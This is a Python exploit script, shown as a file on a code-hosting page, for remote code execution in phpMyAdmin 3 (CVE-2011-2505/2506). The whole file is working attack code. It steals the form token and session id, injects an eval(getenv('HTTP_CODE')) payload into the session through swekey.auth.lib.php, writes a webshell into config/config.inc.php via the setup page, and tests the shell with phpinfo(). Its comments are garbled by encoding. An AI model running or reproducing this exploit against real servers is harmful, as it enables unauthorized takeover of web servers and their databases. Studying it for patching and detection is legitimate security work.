/exploits/php/webapps/17510.py
Python | 91 lines | 57 code | 17 blank | 17 comment | 11 complexity | 3aeaebc56f2894b3f8b2697ce0a664b8 MD5 | raw file
Possible License(s): GPL-2.0
- #!/usr/bin/env python
- # coding=utf-8
- # pma3 - phpMyAdmin3 remote code execute exploit
- # Author: wofeiwo<wofeiwo@80sec.com>
- # Thx Superhei
- # Tested on: 3.1.1, 3.2.1, 3.4.3
- # CVE: CVE-2011-2505, CVE-2011-2506
- # Date: 2011-07-08
- # Have fun, DO *NOT* USE IT TO DO BAD THING.
- ################################################
-
- # Requirements: 1. "config" directory must created&writeable in pma directory.
- # 2. session.auto_start = 1 in php.ini configuration.
-
-
- import os,sys,urllib2,re
-
- def usage(program):
- print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code
- execute exploit"
- print "Usage: %s <PMA_url>" % program
- print "Example: %s http://www.test.com/phpMyAdmin" % program
- sys.exit(0)
-
- def main(args):
- try:
- if len(args) < 2:
- usage(args[0])
-
- if args[1][-1] == "/":
- args[1] = args[1][:-1]
-
- # ��һ������ȡtoken��sessionid��sessionid��phpMyAdmin��ֵ��һ�µ�
- print "[+] Trying get form token&session_id.."
- content = urllib2.urlopen(args[1]+"/index.php").read()
- r1 = re.findall("token=(\w{32})", content)
- r2 = re.findall("phpMyAdmin=(\w{32,40})", content)
-
- if not r1:
- r1 = re.findall("token\" value=\"(\w{32})\"", content)
- if not r2:
- r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content)
- if len(r1) < 1 or len(r2) < 1:
- print "[-] Cannot find form token and session id...exit."
- sys.exit(-1)
-
- token = r1[0]
- sessionid = r2[0]
- print "[+] Token: %s , SessionID: %s" % (token, sessionid)
-
- # �ڶ�����ͨ��swekey.auth.lib.php����$_SESSION��ֵ
- print "[+] Trying to insert payload in $_SESSION.."
- uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA"
- url = args[1]+uri
-
- opener = urllib2.build_opener()
- opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;
- pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %
- (sessionid, sessionid)))
- urllib2.install_opener(opener)
- urllib2.urlopen(url)
-
- # ����setup��ȡshell
- print "[+] Trying get webshell.."
- postdata =
- "phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save"
- % (sessionid, token)
- url = args[1]+"/setup/config.php"
-
- # print "[+]Postdata: %s" % postdata
- urllib2.urlopen(url, postdata)
- print "[+] All done, pray for your lucky!"
-
- # ���IJ����������shell
- url = args[1]+"/config/config.inc.php"
- opener.addheaders.append(('Code', 'phpinfo();'))
- urllib2.install_opener(opener)
- print "[+] Trying connect shell: %s" % url
- result = re.findall("System \</td\>\<td
- class=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url).read())
- if len(result) == 1:
- print "[+] Lucky u! System info: %s" % result[0]
- print "[+] Shellcode is: eval(getenv('HTTP_CODE'));"
-
- else:
- print "[-] Cannot get webshell."
-
- except Exception, e:
- print e
-
- if __name__ == "__main__" : main(sys.argv)